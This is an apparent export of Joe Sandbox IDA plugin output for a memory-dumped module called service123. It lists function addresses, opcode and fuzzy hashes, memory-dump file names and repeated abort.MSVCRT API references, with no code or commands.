Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5ecc22db7fb1f19f338306563de964aae87af56b0b76888168b8d78fb1f5aea
Instruction ID: fb7232a31d540902d429d45a0a4f0e9e1397c790c1885cc5172c6ef88a6ebd2f
Opcode Fuzzy Hash: e5ecc22db7fb1f19f338306563de964aae87af56b0b76888168b8d78fb1f5aea
Instruction Fuzzy Hash: E831E1B0D043598FDB10DFA9C588BDDBFF4AF19308F104468D894AB791D7B4A949CB91

Function 6C819900 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a9f2b8557cc464975963b5630a13f15cac05130c995e251cdef4bdfe75d5e1b
Instruction ID: c3ccb3944dcb5581aae048d2433d408bdd112baa5def6e1fd07dbe0af239b4b7
Opcode Fuzzy Hash: 7a9f2b8557cc464975963b5630a13f15cac05130c995e251cdef4bdfe75d5e1b
Instruction Fuzzy Hash: 4821E2B1A192018BCB14EF79C69849FBAF5AF85644F014D3DE88197B40EB34E84DCBD2

Function 6C7DAC70 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aa2ae7f8096f8d54008c56eddd25cd993fb785b39b209dc3d1873cac52d0709
Instruction ID: 81e898c2ef48a471ff299c32734f8f0a13f835f75205ebdb1ebdd9c09cbfea36
Opcode Fuzzy Hash: 3aa2ae7f8096f8d54008c56eddd25cd993fb785b39b209dc3d1873cac52d0709
Instruction Fuzzy Hash: 9F01ED72B551408F8711EE7DCA4844BB7F1BB8A328F15DA69E84987B05E630E804CBA7

Function 6C7DBAC0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 895b4c68285450aaefb8829f8c2eec01bc6c8f6f67e1540a2e1e1e21f5f34748
Instruction ID: 92917f863e37688a17e380d5832ad9ae0f3970528fa866a83938e7b59436256b
Opcode Fuzzy Hash: 895b4c68285450aaefb8829f8c2eec01bc6c8f6f67e1540a2e1e1e21f5f34748
Instruction Fuzzy Hash: 09011E72B15184CFC701EE7DCA88446B7F1AB8A318F45DA69E84887B05D630F804CBA7

Function 6C7DB280 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcecd40024c4ea1d44fc7ee0fb3750eda1c6a7b3172a4f03848ee1b38a781e30
Instruction ID: 3a2839b2befde484bcaf3e6a1690e2936fbbffda0d98d5da1f06414d02eeb9d8
Opcode Fuzzy Hash: dcecd40024c4ea1d44fc7ee0fb3750eda1c6a7b3172a4f03848ee1b38a781e30
Instruction Fuzzy Hash: 46111CB2A012008FD301DF29C549706BBF0AB8A318F59C5A9D4088B716E37AE406CF96

Function 6C7DBDF0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb80214edb1567fa7947d00ca6ff18b98c7128cae9c5b8c878e3c4ffd7c87f39
Instruction ID: 4aafad55cdcc59b5183a929ce674a5f5d473e0c2369e62823793eef9207fe55d
Opcode Fuzzy Hash: eb80214edb1567fa7947d00ca6ff18b98c7128cae9c5b8c878e3c4ffd7c87f39
Instruction Fuzzy Hash: 8A01DB72A191448FC701EE7DCA8845AB7F4BB4A318F45DA69E84897B05E630F8048BA7

Function 6C808250 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af8b472abfdfd092cb33106365507bb89ec4adb2b55db2642b37a63e356478db
Instruction ID: 4d85c546cfdc7411710cba4c572aba65ca218cc0d244269362dd3be911377aa1
Opcode Fuzzy Hash: af8b472abfdfd092cb33106365507bb89ec4adb2b55db2642b37a63e356478db
Instruction Fuzzy Hash: F0012C71A192808FC711DF3D898552BBBF06B5B308F44D9AEE888C7716E235C405CB67

Function 6C78D2B4 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95ee32aa5ad927b1dc4a83478f86cfe336878b9b3e5cb2284810fcf843c81a86
Instruction ID: c7399034cf589d929b3a2e8bb44dee7b60f957e49630063173913822be598519
Opcode Fuzzy Hash: 95ee32aa5ad927b1dc4a83478f86cfe336878b9b3e5cb2284810fcf843c81a86
Instruction Fuzzy Hash: 9E019EB1A023019BD704EF29C58476AFBE4AF85258F10C47DD948CBB01D775D846CBD5

Function 6C834110 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db6676acc09d2dfbba726736535f07ffad09e64a92497a87ffb3a3a3b5578dcb
Instruction ID: 9b4d4f9a589b7cbda73c4172fc204ac2297a61b8d73fa0cc1f94b19469238d72
Opcode Fuzzy Hash: db6676acc09d2dfbba726736535f07ffad09e64a92497a87ffb3a3a3b5578dcb
Instruction Fuzzy Hash: BEF01236B141408F8721EE7DC64555ABBF0678B318F84BD69E85CC3B05E235D4049BA7

Function 6C7B9F90 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 174ec0dd25a4633858c7013ba85478dc5551816b70f991a7b818a53437d9627f
Instruction ID: bc0172ab08b17917aa2d9049060d7362f3aae1e1b6099a8383f30a4d5b96de6e
Opcode Fuzzy Hash: 174ec0dd25a4633858c7013ba85478dc5551816b70f991a7b818a53437d9627f
Instruction Fuzzy Hash: EAD01231E010009F8B01EE2DC648416F7B0AB56318B54D9A5E40897A05E632D805CB9A

Function 6C78D424 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f47961f71c532a5ba7c31f82db50096166d24a052be1b17e5d052e010392cb2e
Instruction ID: db82903ff4862db69897bdaea4db631876c7fc90a309b9736d15bfc7c85b018d
Opcode Fuzzy Hash: f47961f71c532a5ba7c31f82db50096166d24a052be1b17e5d052e010392cb2e
Instruction Fuzzy Hash: 8EC0C9718011104ACF40AF6981844B8B2E06B42288B526C68C4989B600DB74D8469A49

Function 6C78D5A4 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a0d6367cb766bfedf8e938575c0c5d72422501bc95d77e19ba91109e056c638
Instruction ID: c6ea4e4311b44dfe4a7a3d61251a9f35968cd90ffab88548f17934a2a2c48b7e
Opcode Fuzzy Hash: 5a0d6367cb766bfedf8e938575c0c5d72422501bc95d77e19ba91109e056c638
Instruction Fuzzy Hash: D4C0C9718011144ACF10AF65C1845B8B2F06B42248B126869C084DB600DB34C846DA89

Function 6C78D724 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 775594ecdda66c0ce29efa73e70a845c825609a65366644225eeb35c10ba540a
Instruction ID: f242043d3d24d715f7aed95ca7b8ec256bd7c7ba94e970ac378527943f49508f
Opcode Fuzzy Hash: 775594ecdda66c0ce29efa73e70a845c825609a65366644225eeb35c10ba540a
Instruction Fuzzy Hash: 95C01271D011104BCF00EF7582C40BCF6F06B42348F526C78C084DB600DB74C846DB89

Function 6C77AF80 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction ID: f1510a165dac5ed67214d07faaabbf6c662e9dbf1130050b7606d0e784a8fe92
Opcode Fuzzy Hash: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction Fuzzy Hash: DAC012B0C042408AC210BF38E20A269BAB06B52208FC46CACE48427301EB39C41C869B

Function 6C76BAD0 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 339COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D03
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D08
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D12
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D17
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D21
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D26
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Strings

@, xrefs: 6C76BAB1

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID: @
API String ID: 4206212132-2766056989
Opcode ID: 06e5c9fb398bebce468898e79c4226d939c7e8ce81a297c868f76e726b2d460b
Instruction ID: feb229240132d6cc5c8e4f972f878514c44c38236ba0542c89943699334b83aa
Opcode Fuzzy Hash: 06e5c9fb398bebce468898e79c4226d939c7e8ce81a297c868f76e726b2d460b
Instruction Fuzzy Hash: D6B146326093298FC3208E6EC690355B7E2BB86318F45497DEC9997F85C335BD09E781

Function 6C762290 Relevance: 42.4, APIs: 28, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b17fd4fd130d61766dacbc18923239b489649f20bb81fe2f6489233db4f3dc25
Instruction ID: da24a7cfb4cfee3f25ce302e0fd3e4901639879698f72e08328df6d2fed46482
Opcode Fuzzy Hash: b17fd4fd130d61766dacbc18923239b489649f20bb81fe2f6489233db4f3dc25
Instruction Fuzzy Hash: 3DC1BD716042018FD784CF2BC58835AB7E2AB85348F159969DC98CFF46D739E90ACF90

Function 6C76B7A0 Relevance: 42.2, APIs: 28, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2293aa965d5a37ab1a2770e343eb26f075f99e2ed235af2e8cbd918d5933e19
Instruction ID: 928f7639cd0bdc7e04c801b864e1aded53a34ad9e48f46120aa3554cf882aa1e
Opcode Fuzzy Hash: c2293aa965d5a37ab1a2770e343eb26f075f99e2ed235af2e8cbd918d5933e19
Instruction Fuzzy Hash: DC41B1716093569FD721CE2AC180716BBE0AF86328F1899AEED954BF42C331F846D781

Function 6C7628FA Relevance: 42.1, APIs: 28, Instructions: 84COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C836CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D03
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D08
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D12
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D17
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D21
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D26
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 78cae2c24737a994d141bddf5523abccd13819d37654d3a484e13095aa591eb4
Instruction ID: f849f1e90da9cbbb581b57a443d55ba0bdfadcf10bbfd83ea21459c506245685
Opcode Fuzzy Hash: 78cae2c24737a994d141bddf5523abccd13819d37654d3a484e13095aa591eb4
Instruction Fuzzy Hash: 3C11C2B2642201CBE718FF1DE999B5577B0FB61309F11AA58D584C7A11D738E818CBA0

Function 6C762A2F Relevance: 42.1, APIs: 28, Instructions: 82COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C836CF4
